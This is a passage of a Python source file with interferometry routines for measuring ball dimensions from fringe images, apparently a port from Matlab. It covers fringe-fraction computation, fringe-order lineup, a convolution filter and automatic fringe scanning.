FFanalysis(pf_top, pf_bot, xc, yc, x_res): #pylint: disable=R0914, R0912\r\n \"\"\"\r\n FFanalysis.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n calculate fringe fraction from polyfit curves to fringe centers\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.003 to v1.00\r\n June 20, 2018\r\n -converted from FFanalysis.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n\r\n # Top fringe, find point nearest to curve\r\n near_top = np.zeros((1, 2))\r\n near_bot = np.zeros((1, 2))\r\n\r\n near_top[0, 0] = minpt2crv(pf_top, xc, yc) #minimize point to polynomial distance in x\r\n near_top[0, 1] = np.polyval(pf_top, near_top[0, 0]) #calculate point in y\r\n # Bottom fringe, find point nearest to curve\r\n near_bot[0, 0] = minpt2crv(pf_bot, xc, yc) #minimize point to polynomial distance in y\r\n near_bot[0, 1] = np.polyval(pf_bot, near_bot[0, 0]) #calculate point in y\r\n\r\n # fringe fraction nearly normal to fringes (average of slopes)\r\n # calculate derivative of polynomial and tangent line at point\r\n dpf_top = [2*pf_top[0], pf_top[1]] #derivative of polynomial fit of top fringe\r\n mTTop = np.polyval(dpf_top, near_top[0, 0]) #slope of tangent\r\n perp_top_tan = np.array([-1/mTTop, (yc + 1/mTTop*xc)]) #line of top perpendicular to tangent through ball 
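A minimal check of minpt2crv above (assuming it is in scope): the nearest point on the parabola y = x**2 to the made-up point (0.5, 1.0). The cubic derivative condition 4x**3 - 2x - 1 = 0 has its real root near 0.885, and fsolve starts from xo.

import numpy as np

z = minpt2crv(np.array([1.0, 0.0, 0.0]), 0.5, 1.0)   # pf = [a, b, c] for y = x**2
print(round(float(z[0]), 3))                          # ~0.885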
center\r\n\r\n dpf_bot = [2*pf_bot[0], pf_bot[1]] #derivative of polnomial fit of bottom fringe\r\n mTBot = np.polyval(dpf_bot, near_bot[0, 0]) #slope of tangent\r\n perp_bot_tan = np.array([-1/mTBot, yc + 1/mTBot*xc]) #line of bottom perpendicular to tangent through ball center\r\n # check if perpendicular projections are opposing vectors. if so, invert one (bottom)\r\n if (perp_top_tan[0] > 0 and perp_bot_tan[0] < 0) or (perp_top_tan[0] < 0 and perp_bot_tan[0] > 0):\r\n if (perp_top_tan[1] > 0 and perp_bot_tan[1] < 0) or (perp_top_tan[1] < 0 and perp_bot_tan[1] > 0):\r\n perp_bot_tan = np.array([1/mTBot, (yc - 1/mTBot*xc)])\r\n avg_perp = (perp_top_tan + perp_bot_tan)/2 #average perpendicular to tangent through ball center\r\n avg_perp = np.append(0, avg_perp)\r\n\r\n T = np.roots(pf_top - avg_perp) #find intersection of perp tangent and fringe profile\r\n B = np.roots(pf_bot - avg_perp)\r\n # check which intersection point lines within range of image\r\n if len(T) >= 2:\r\n # check if top intersection lies within range of image\r\n if T[0] > 0 and T[0] < x_res:\r\n T = np.delete(T, 1)\r\n elif T[1] > 0 and T[1] < x_res:\r\n T[0] = T[1]\r\n T = np.delete(T, 1)\r\n else:\r\n raise ValueError('Top perpendicular intersection of fringe fit and FF evaluation axis not found.')\r\n\r\n if B[0] > 0 and B[0] < x_res:\r\n B = np.delete(B, 1)\r\n elif B[1] > 0 and B[1] < x_res:\r\n B[0] = B[1]\r\n B = np.delete(B, 1)\r\n else:\r\n raise ValueError('Bottom perpendicular intersection of fringe fit and FF evaluation axis not found.')\r\n\r\n else:\r\n if T < 0 or T > x_res:\r\n raise ValueError('Top perpendicular intersection of fringe fit and FF evaluation axis not found.')\r\n if B < 0 or B > x_res:\r\n raise ValueError('Bottom perpendicular intersection of fringe fit and FF evaluation axis not found.')\r\n dist_TB = ((T - B)**2 + (np.polyval(avg_perp, T) - np.polyval(avg_perp, B))**2)**(1/2) #calculate distance between top and bottom fringe along average perp\r\n dist_CB = ((xc - B)**2 + (yc - np.polyval(avg_perp, B))**2)**(1/2) #calculate distance between ball center and bottom fringe\r\n FFexact = dist_CB/dist_TB #fringe fraction is then the ratio between ball center to bottom and top to bottom\r\n if yc > np.polyval(avg_perp, B): #if ball center was below bottom fringe\r\n FFexact = -FFexact #display as negative\r\n\r\n return FFexact, avg_perp\r\n\r\ndef strang_autolineup(ball_results): #pylint: disable=R0914\r\n \"\"\"\r\n strang_autolineup.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n June, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n Calculates lineup of a ball in deformed state from strangviewer interferometer, corrected to 20 deg. 
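A minimal sketch of the fringe-fraction ratio computed in FFanalysis above, FF = (ball center to bottom fringe) / (top fringe to bottom fringe), reduced to 1-D made-up positions along the averaged perpendicular:

y_top, y_bot, y_center = 120.0, 220.0, 190.0   # hypothetical pixel coordinates
ff = (y_center - y_bot) / (y_top - y_bot)
print(ff)   # 0.3: center sits 30% of the way up from the bottom fringe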
C\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -verified against Wei Ren's (NIST) Gage Block: Spectrum softare to within 0.10 nm lineup\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -ball_results, dictionary containing environment conditions and fringe fraction results\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -lineup_const - constructive interference lineup, nm\r\n -m_modifier - modifier to add to lineups to shift to another fringe order\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.14 to v1.00\r\n June 20, 2018\r\n -converted from strang_autolineup.m to replicate behavior\r\n -removed output of deformation and measurement forces\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n # load variables from ball_rersults input\r\n lambda_air = np.zeros(np.shape(ball_results['T_matl']))\r\n no_images, no_forces = np.shape(ball_results['T_matl'])\r\n\r\n with open(fringefinderfuncs_directory+'/laser_wavelengths.csv') as laserfile:\r\n reader = csv.reader(laserfile, delimiter=',') #read laser vacuum wavelengths and obliquity\r\n laserfiledata = list(zip(*reader))\r\n lambda_vac = float(laserfiledata[1][laserfiledata[0].index('strang_HeNe')])\r\n slitobliq = float(laserfiledata[1][laserfiledata[0].index('strang2_slitobliq')]) #strang #2 slit and obliquity, ppm (nm/mm)\r\n\r\n for i in range(0, no_images):\r\n for j in range(0, no_forces):\r\n lambda_air[i, j] = wavelength_air(ball_results['T_air'][i, j], ball_results['RH_air'][i, j], ball_results['P_air'][i, j], lambda_vac)\r\n\r\n balldev = ball_results['ballnomdev'] - ball_results['def_top'] - ball_results['def_bot']\r\n L = ball_results['ballnom'] + ball_results['ballnomdev']/1e6 #best known ball size, mm\r\n\r\n # constructive fringe\r\n # L = m(lambda/2)\r\n m_const = np.floor(2*L/(lambda_air/1e6)) #calculate fringe order\r\n # calculate nominal deviation lineup in nanometers\r\n lineup_const = (((m_const*lambda_air/2 + lambda_air/2*(ball_results['FFexact_all']/100))/1e6 - ball_results['dL_T'] + slitobliq*ball_results['ballnom']/1e6 - ball_results['ballnom'])*1e6) #calculate constructive interference lineup\r\n lineup_const_shifted = ((((m_const + 1)*lambda_air/2 + lambda_air/2*(ball_results['FFexact_all']/100))/1e6 - ball_results['dL_T'] + slitobliq*ball_results['ballnom']/1e6 - ball_results['ballnom'])*1e6) #calculate constructive interference lineup shifted by 1 fringe order\r\n m_modifier = sum(np.sum(lineup_const_shifted - lineup_const, axis=0) / no_images)/no_forces #calculate average distance between consecutive fringe orders\r\n\r\n # compare lineup to balldev, if difference is greater than (m_modifier/2), shift lineup by +/- m_modifier\r\n for i in range(0, no_images): #shift rest of the image lineup per force\r\n for j in range(0, no_forces): #shift first image lineup per force first\r\n err = 1\r\n while abs(lineup_const[i, j] - balldev[i, j]) >= m_modifier/2:\r\n if (lineup_const[i, j] - balldev[i, j]) >= m_modifier/2:\r\n lineup_const[i, j] = lineup_const[i, j] - m_modifier\r\n elif abs(lineup_const[i, j] - balldev[i, j]) >= m_modifier/2 and (lineup_const[i, j] - balldev[i, j]) < 0:\r\n lineup_const[i, j] = lineup_const[i, j] + m_modifier\r\n err += 1 #while breakout\r\n if err > 100:\r\n raise ValueError('Too many fringe order shift 
iterations (>100) in solving lineup_const')\r\n\r\n # %destructive fringe\r\n # % L = (m+1/2)(lambda/2)\r\n # % m_dest = floor(2*L/(lambda_air/1e6)) + 1/2;\r\n # %lineup_dest = (m_dest*lambda_air/2 + lambda_air/2*(FF/100))/1e6 - dL_T + slitobliq*L/1e6 - ballnom;\r\n\r\n # store slope, if residuals < 10 nm (good F^(2/3) fit)\r\n # pf_force_lineup_residuals = lineup_const - polyval(pf_force_lineup, meas_forces23)\r\n # if max(abs(pf_force_lineup_residuals)) < 10:\r\n # #this was unfinished in MATLAB, too\r\n # end\r\n\r\n return lineup_const, m_modifier\r\n\r\ndef Make2DMatlike(w, h):\r\n \"\"\"\r\n Make2DMatlike.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n July, 2018\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n create a 2D Matlab-like data structure. Once saved with scipy.io.savemat, it can be accessed like a Matlab .mat file in Matlab or Python\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -w - width of matrix, columns\r\n -h - height of matrix, rows\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -list of list of dictionaries sized w by h\r\n assign dictionary key and value using A['data'][r][c][key] = value\r\n get value using A['data'][r][c][key]\r\n once A is saved with scipy.io.savemat, values can be assigned using above OR A['data'][r, c].key\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from v1.00 to v1.00\r\n July 4, 2018\r\n -initial version\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n return {'data' : [[{} for x in range(h)] for y in range(w)]}\r\n\r\ndef filter_conv(arrayin, width):\r\n \"\"\"\r\n filter_conv.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n July, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n convolution filter - filter a data point in array based on value of surrounding data points. useful for averaging random noise\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -Coordinate Measuring Machines and Systems (Bob Hocken) book\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -array - 1D array of data points\r\n -width - width of data points in array to apply filter. only positive nonzero integers. 
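A worked sketch of the fringe-order arithmetic in strang_autolineup above, L = m * (lambda/2), with made-up values: a 25.4 mm ball and a 632.99 nm air wavelength. Adjacent fringe orders differ in implied length by lambda/2.

import numpy as np

lambda_air = 632.99e-6                  # mm, hypothetical
L = 25.4                                # mm, best known ball size
m = np.floor(2 * L / lambda_air)        # integer fringe order
step_nm = lambda_air / 2 * 1e6          # one order ~ 316.5 nm of length
print(int(m), round(step_nm, 1))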
only odd numbers\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -conv_array - convoluted array\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.00 to v1.00\r\n July 7, 2018\r\n -converted from filter_conv.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n # check if width is positive nonzero integer\r\n if not isinstance(width, int) or width <= 0:\r\n raise ValueError('Width of filter must be positive and nonzero integer.')\r\n\r\n # check if width is odd number\r\n if width%2 == 0:\r\n raise ValueError('Width of filter must be an odd number.')\r\n\r\n width_half = int((width - 1)/2)\r\n conv_array = np.zeros((len(arrayin)))\r\n for i in range(0, len(arrayin)):\r\n if i <= width_half:\r\n left = 0\r\n right = i+width_half+1\r\n elif len(arrayin) - i <= width_half:\r\n left = i - width_half\r\n right = len(arrayin)\r\n else:\r\n left = i - width_half\r\n right = i + width_half+1\r\n conv_array[i] = sum(arrayin[slice(left, right)])/len(np.arange(left, right))\r\n return conv_array\r\n\r\ndef fringe_autoscan(fringeimage, I_drop, I_max, n_nodes, xc, yc, r, allmode, xymbloop): #not too many statements, branches, variables, arguments. leave me be, pylint: disable=R0913, R0914, R0912, R0915\r\n \"\"\"\r\n fringe_autoscan.py\r\n Tested with Python 3.6 (Anaconda 5 stack) on Linux Mint 18\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Notes\r\n Authored by: Michael Braine, Physical Science Technician\r\n PHONE: 301 975 3471\r\n EMAIL: michael.braine@nist.gov (use this instead)\r\n July, 2018 (ported from Matlab)\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Purpose\r\n generate scan nodes and calculate fringe positions and orientations\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n References\r\n -none\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Inputs\r\n -fringeimage - fringe pattern image in uint8 format\r\n -I_drop - amount of intensity drop (8 bit) to determine edge of fringe region, for approximate fringe location\r\n -I_max - maximuum intensity for destructive fringe determination, for approximate fringe location\r\n -n_nodes - number of verical scan nodes\r\n -xc - center of ball in x (horizontal)\r\n -yc - center of ball in y (vertical)\r\n -allmode - string toggle, 'all' or 'center', output all fringes or only two fringes surrounding ball center\r\n -xymbloopint - intersection coordinates of loop stem-bal shadow, and mx+b equation for each side of loop stem [leftx lefty leftm leftb; rightx righty rightm rightb]\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Outputs\r\n -fringe - dictionary, each fringe(n) containts information for each destructive fringe\r\n fringe[n]['center'] - center of node in (x,y)\r\n fringe[n]['X_top'] - locations of node start scans in X\r\n fringe[n]['Y_top'] - locations of node start scans in Y\r\n fringe[n]['X_endtop'] - locations of node end scans in X\r\n fringe[n]['Y_endtop'] - locations of node end scans in Y\r\n fringe[n]['pf_fringe'] - first order polynomial fit of nth fringes\r\n scan_width - width of each node in pixels\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n Change Log from mv1.017 to 
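A minimal sketch exercising filter_conv above (assuming it is in scope): a width-3 moving average whose window shrinks at the array edges, shown on a made-up impulse.

import numpy as np

print(filter_conv(np.array([0.0, 0.0, 9.0, 0.0, 0.0]), 3))
# -> [0. 3. 3. 3. 0.]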
v1.000\r\n July 4, 2018\r\n -converted from fringe_autoscan.m to replicate behavior\r\n\r\n //////////////////////////////////////////////////////////////////////////////\r\n \"\"\"\r\n # Variables\r\n Iwidth_min = 10 #default 10 #minimum pixel width of I_drop\r\n scan_increase = 0.5 #default 0.75\r\n rx_avoid = 25 #default 25 #number of pixels in x from ball shadow to avoid\r\n ry_avoid = 30 #default 50 #number of pixels in y from ball shadow to avoid\r\n edge_avoid = 15 #default 20\r\n node_fringe_min = 4 #minimum number of nodes on a fringe\r\n loop_avoid = 20 #number of pixels in x from loop shadow to avoid\r\n y_res, x_res = np.shape(fringeimage)\r\n node_width = np.round(x_res/n_nodes) #width of each node, pixels\r\n py = np.arange(0, y_res)\r\n\r\n # Detect fringe locations surrounding ball center\r\n # scan every 1/n_nodes horizontal of image\r\n # filter drops that are less than Iwidth_min pixels\r\n # determine approximate fringe center\r\n scan = {}\r\n center_approx = {}\r\n index_new = {}\r\n for i in range(1, n_nodes): #lots of nests are ok if they work, pylint: disable=R1702\r\n scan[str(i-1)] = [np.linspace(np.round((i)/n_nodes*x_res - 1/(2*n_nodes)*x_res), np.round(i/n_nodes*x_res - 1/(2*n_nodes)*x_res), y_res).astype(int), np.linspace(0, y_res-1, y_res).astype(int)]\r\n ytest = []\r\n #if within region of ball shadow, remove node\r\n if (scan[str(i-1)][0] > (xc - r - rx_avoid)).any() and (scan[str(i-1)][0] < (xc + r + rx_avoid)).any(): #remove square area around (xc,yc) + r + rx/y_avoid\r\n ytest = np.arange(np.round(yc - r - ry_avoid), np.round(yc + r + ry_avoid))\r\n\r\n if sum(xymbloop) != 0: #if loop region exists and node is within region, remove scans in that region\r\n if xymbloop[1] < yc:\r\n raise ValueError('There is not a case for ball loop above sphere in image.')\r\n Lloop_xvals = min(np.round((py[py > xymbloop[1]] - xymbloop[3])/xymbloop[2]))\r\n Rloop_xvals = min(np.round((py[py > xymbloop[5]] - xymbloop[7])/xymbloop[6]))\r\n if scan[str(i-1)][0][0] > (Lloop_xvals - loop_avoid) and scan[str(i-1)][0][0] < (Rloop_xvals + loop_avoid): #if scan(i) falls within loop x-range\r\n AL = [[xymbloop[2], -1], #coefficient matrix\r\n [1, 0]]\r\n BL = [[-xymbloop[3]], #parameter matrix\r\n [scan[str(i-1)][0][0]]]\r\n Lloopint, _, _, _ = np.linalg.lstsq(AL, BL, rcond=None) #solve for intersection\r\n AR = [[xymbloop[6], -1],\r\n [1, 0]]\r\n BR = [[-xymbloop[7]],\r\n [scan[str(i-1)][0][0]]]\r\n Rloopint, _, _, _ = np.linalg.lstsq(AR, BR, rcond=None)\r\n\r\n if Lloopint[1] < yc and Lloopint[1] > y_res and Rloopint[1] < yc and Rloopint[1] > y_res: #if both intersection solutions lies in range of image for scan(i).pos(1,1)\r\n if xymbloop[2] < 0: #if loop tilted down and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(Rloopint[1]), np.round(Lloopint[1]))) #remove points between right loop intersection and left loop intersection\r\n elif xymbloop[2] > 0: #if loop tilted up and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(Lloopint[1]), np.round(Rloopint[1]))) #remove points between left loop intersection and right loop intersection\r\n elif Lloopint[1] < yc and Lloopint[1] > y_res: #if only left loop intersection lies in range of image for scan(i).pos(1,1)\r\n if xymbloop[2] < 0: #if loop tilted down and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(xymbloop[1]), np.round(Rloopint[1]))) #remove points between ball shadow and left loop intersection\r\n elif xymbloop[2] > 0: #if loop tilted up and right for scan\r\n ytest = 
np.append(ytest, np.arange(np.round(Lloopint[1]), y_res)) #remove points between left loop intersection and bottom of image\r\n elif Rloopint[1] < yc and Rloopint[1] > y_res: #if only right loop intersection lies in range of image for scan(i).pos(1,1)\r\n if xymbloop[6] < 0: #if loop tilted down and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(Rloopint[1]), y_res)) #remove points between right loop intersection and bottom of image\r\n elif xymbloop[6] > 0: #if loop tilted up and right for scan\r\n ytest = np.append(ytest, np.arange(np.round(xymbloop[5]), np.round(Rloopint[1]))) #remove points between ball shadow and right loop intersection\r\n else:\r\n ytest = np.append(ytest, np.arange(np.round(yc), y_res)) #if neither intersections in range of image, remove points between ball center and bottom of image\r\n if np.size(ytest) != 0:\r\n ytest = np.unique(ytest.astype(int))\r\n scan[str(i-1)][0] = np.delete(scan[str(i-1)][0], ytest, axis=0)\r\n scan[str(i-1)][1] = np.delete(scan[str(i-1)][1], ytest, axis=0)\r\n\r\n fringe_pos = fringeimage[scan[str(i-1)][1], scan[str(i-1)][0]] < I_drop #scan, determine where intensitiies fall below I_drop\r\n index_trash = np.where(np.diff(fringe_pos))[0]\r\n #determine fringes based on minimum fringe width\r\n index_new = np.array([])\r\n for j in range(1, len(index_trash)):\r\n if index_trash[j] - index_trash[j-1] >= Iwidth_min: #if meets minimum fringe width\r\n index_new = np.append(index_new, index_trash[j])\r\n # if j == len(index_trash): #if last filtering (len(index_trash)-1 ends loop, so len(index_trash)-2 will be last j index)\r\n # if len(index_new) % 2 != 0: #if length of vals are odd (fringe scan needs start and end)\r\n # if scan[str(i-1)][0][0] > (Lloop_xvals - loop_avoid) and scan[str(i-1)][0][0] < (Rloop_xvals + loop_avoid): #if scan is above sphere shadow and loop\r\n # index_new = np.append(index_new, index_trash[j]) #add end point of fringe\r\n #determine if first or second scan segment is the fringe (i don't know what this does anymore...maybe deletes first \"fringe\" if too bright?)\r\n # if np.size(index_new) != 0: #if fringes detected in scan\r\n # if I_pos[(index_new[0]+1).astype(int)] >= I_drop:\r\n # index_new[0] = []\r\n\r\n j = 1\r\n n = 0\r\n center_approx[str(i-1)] = np.array([0, 0])\r\n if np.size(index_new) != 0: #if fringes detected in scan\r\n while j < len(index_new):\r\n avg = np.round((index_new[j] + index_new[j-1])/2).astype(int) #approximate fringe center is average location\r\n if fringeimage[scan[str(i-1)][1][avg], scan[str(i-1)][0][avg]] >= I_max:\r\n j += 1\r\n else:\r\n center_approx[str(i-1)] = np.vstack([center_approx[str(i-1)], [scan[str(i-1)][0][avg], scan[str(i-1)][1][avg]]])\r\n j += 2\r\n n += 1\r\n center_approx[str(i-1)] = np.delete(center_approx[str(i-1)], 0, axis=0)\r\n\r\n # fringeimagefig, fringeimageax = plt.subplots(1)\r\n # fringeimagefig.canvas.set_window_title('FringeImage')\r\n # fringeimageax.imshow(fringeimage, cmap='gray')\r\n # fringeimageax.set_ylim([y_res, 0])\r\n # fringeimageax.set_xlim([0, x_res])\r\n # fringeimageax.autoscale = False\r\n # for i in range(n_nodes):\r\n # fringeimageax.plot(center_approx[str(i)][:, 0], center_approx[str(i)][:, 1], 'g.')\r\n\r\n scan_width = np.round(scan_increase*max(np.diff(index_new))).astype(int) #determine max width of fringes, width of scan region * scan_increase will be scan width\r\n n_fringes, _ = np.shape(center_approx['0'])\r\n fringe = {}\r\n fringe_center = {}\r\n fringe_center['0'] = np.array([])\r\n for m in range(0, 
n_fringes):\r\n fringe[str(m)] = {}\r\n fringe[str(m)]['pf_fringe'] = np.array([])\r\n fringe[str(m)]['center'] = center_approx['0'][m, :]\r\n # sort nodes by fringe\r\n # determine number of fringes in each vertical scan, sort node location per fringe\r\n for i in range(2, n_nodes):\r\n n_fringes = np.shape(center_approx[str(i-1)])\r\n n_fringes = n_fringes[0]\r\n i_center = center_approx[str(i-1)]\r\n i_1_center = center_approx[str(i-2)]\r\n r_1, _ = np.shape(i_1_center)\r\n if r.round().astype(int) > r_1:\r\n padding = np.zeros((r.round().astype(int) - r_1, 2))\r\n i_1_center = np.append(i_1_center, padding, axis=0)\r\n i_1_center[i_1_center == 0] = math.inf #make inf to prevent accident closest center to (0,0)\r\n elif r_1 > r.round().astype(int)[0]:\r\n padding = np.zeros(r_1 - r.round().astype(int)[0], 2)\r\n i_center = np.append(i_center, padding, axis=0)\r\n i_center[i_center == 0] = math.inf\r\n # find fringe center in subsequent scans that is closest to the center of previous\r\n for j in range(0, n_fringes):\r\n # These don't appear to have been used in matlab\r\n # if i_center[j, 0] != math.inf:\r\n # residual = np.sqrt((i_center[j, 0] - i_1_center[:, 0])**2 + (i_center[j, 1] - i_1_center[:, 1])**2)\r\n # res_index = np.where(min(residual) == residual)[0]\r\n m = 0\r\n m_max = len(fringe)\r\n if m_max < 2:\r\n return 'failed', 'failed'\r\n newfringe = True\r\n\r\n while m < m_max:\r\n if np.size(fringe[str(m)]['center']) > 2:\r\n if i_center[j, 1] > fringe[str(m)]['center'][-1, 1] - scan_width and i_center[j, 1] < fringe[str(m)]['center'][-1, 1] + scan_width:\r\n fringe[str(m)]['center'] = np.vstack((fringe[str(m)]['center'], i_center[j, :]))\r\n newfringe = False\r\n break\r\n else:\r\n if i_center[j, 1] > fringe[str(m)]['center'][-1] - scan_width and i_center[j, 1] < fringe[str(m)]['center'][-1] + scan_width:\r\n fringe[str(m)]['center'] = np.vstack((fringe[str(m)]['center'], i_center[j, :]))\r\n newfringe = False\r\n break\r\n m += 1\r\n if newfringe:\r\n fringe[str(m)] = {}\r\n fringe[str(m)]['pf_fringe'] = np.array([])\r\n fringe[str(m)]['center'] = i_center[j, :]\r\n\r\n # fit lines, determine approximate slope of fringes\r\n for m in range(0, len(fringe)):\r\n det_nodes = int(np.size(fringe[str(m)]['center'])/2)\r\n if det_nodes >= node_fringe_min: #only evaluate fringes with min number of nodes\r\n pf_fringe = np.polyfit(fringe[str(m)]['center'][:, 0], fringe[str(m)]['center'][:, 1], 1)\r\n if 'allpf_fringe' not in locals(): #checking if allpf_fringe exists\r\n allpf_fringe = np.array(pf_fringe)\r\n else:\r\n allpf_fringe = np.vstack((allpf_fringe, pf_fringe))\r\n fringe[str(m)]['pf_fringe'] = pf_fringe\r\n else:\r\n del fringe[str(m)]\r\n\r\n # genrate node scans and truncate image edge nodes\r\n slope_perp = -1/allpf_fringe[np.where(abs(allpf_fringe[:, 0]) == max(abs(allpf_fringe[:, 0]))), 0][0][0] #determine maximum abs() slope, calculate perpendicular\r\n scan_trunc = (np.ceil((abs(scan_width/slope_perp))/2) + edge_avoid).astype(int) #calculate amount of truncation at image edge in x due to fringe angle, add edge_avoid pixel safety\r\n for m in range(0, len(fringe)):\r\n fringe[str(m)]['center'][:, 1] = np.round(filter_conv(fringe[str(m)]['center'][:, 1], 3))\r\n fringe[str(m)]['X_top'] = np.round(fringe[str(m)]['center'][:, 0] - node_width/2) #generate scans based on node width, node center\r\n fringe[str(m)]['Y_top'] = np.round(fringe[str(m)]['center'][:, 1])\r\n fringe[str(m)]['X_endtop'] = np.round(fringe[str(m)]['center'][:, 0] + node_width/2)\r\n 
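#end scans mirror the start scans about each node center; the row (Y) is unchanged because nodes are scanned horizontally\r\n        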
fringe[str(m)]['Y_endtop'] = np.round(fringe[str(m)]['center'][:, 1])\r\n if np.size(np.where(fringe[str(m)]['center'][:, 0] - node_width/2 < scan_trunc)) > 0:\r\n trunc_index = np.where(fringe[str(m)]['center'][:, 0] - node_width/2 < scan_trunc)[0]\r\n if len(trunc_index) > 1: #check if more than one node affected by truncation\r\n for n, val in enumerate(trunc_index):\r\n fringe[str(m)]['center'] = np.delete(fringe[str(m)]['center'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['X_top'] = np.delete(fringe[str(m)]['X_top'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['Y_top'] = np.delete(fringe[str(m)]['Y_top'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['X_endtop'] = np.delete(fringe[str(m)]['X_endtop'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['Y_endtop'] = np.delete(fringe[str(m)]['Y_endtop'], np.arange(0, val), axis=0)\r\n fringe[str(m)]['X_top'][0] = scan_trunc\r\n if fringe[str(m)]['X_top'][1] <= scan_trunc:\r\n fringe[str(m)]['center'] = np.delete(fringe[str(m)]['center'], 0, axis=1)\r\n fringe[str(m)]['X_top'] = np.delete(fringe[str(m)]['X_top'], 0, axis=1)\r\n fringe[str(m)]['Y_top'] = np.delete(fringe[str(m)]['Y_top'], 0, axis=1)\r\n fringe[str(m)]['X_endtop'] = np.delete(fringe[str(m)]['X_endtop'], 0, axis=1)\r\n fringe[str(m)]['Y_endtop'] = np.delete(fringe[str(m)]['Y_endtop'], 0, axis=1)\r\n if np.size(np.where(fringe[str(m)]['center'][:, 0] - node_width/2 >= x_res - scan_trunc)) > 0:\r\n trunc_index = np.where(fringe[str(m)]['center'][:, 0] - node_width/2 < scan_trunc)[0]\r\n if len(trunc_index) > 1: #check if more than one node affected by truncation\r\n fringe[str(m)]['center'] = np.delete(fringe[str(m)]['center'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['X_top'] = np.delete(fringe[str(m)]['X_top'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['Y_top'] = np.delete(fringe[str(m)]['Y_top'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['X_endtop'] = np.delete(fringe[str(m)]['X_endtop'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['Y_endtop'] = np.delete(fringe[str(m)]['Y_endtop'], np.arange(0, trunc_index), axis=0)\r\n fringe[str(m)]['X_endtop'][-1] = x_res - scan_trunc\r\n if fringe[str(m)]['X_endtop'][-1] >= x_res - scan_trunc:\r\n fringe[str(m)]['center'] = np.delete(fringe[str(m)]['center'], -1, axis=1)\r\n fringe[str(m)]['X_top'] = np.delete(fringe[str(m)]['X_top'], -1, axis=1)\r\n fringe[str(m)]['Y_top'] = np.delete(fringe[str(m)]['Y_top'], -1, axis=1)\r\n fringe[str(m)]['X_endtop'] = np.delete(fringe[str(m)]['X_endtop'], -1, axis=1)\r\n fringe[str(m)]['Y_endtop'] = np.delete(fringe[str(m)]['Y_endtop'], -1, axis=1)\r\n # check if average intensity is below threshold, in case node contains anomaly\r\n # disabled in matlab\r\n # L_center, _ = np.shape(fringe[str(m)]['center'])\r\n # for j in range(0, L_center):\r\n # index_erase = []\r\n # scan_inc = (fringe[str(m)]['X_endtop'][j] - fringe[str(m)]['X_top'][j])/7\r\n # for i in range(1, 6):\r\n # x_scan = fringe[str(m)]['X_top'][j] + np.round(i*scan_inc)\r\n # y_scan = fringe[str(m)]['Y_top'][j] - np.arange(np.round(scan_width/2), fringe[str(m)]['Y_top'][j] + np.round(scan_width/2))\r\n # I_test = 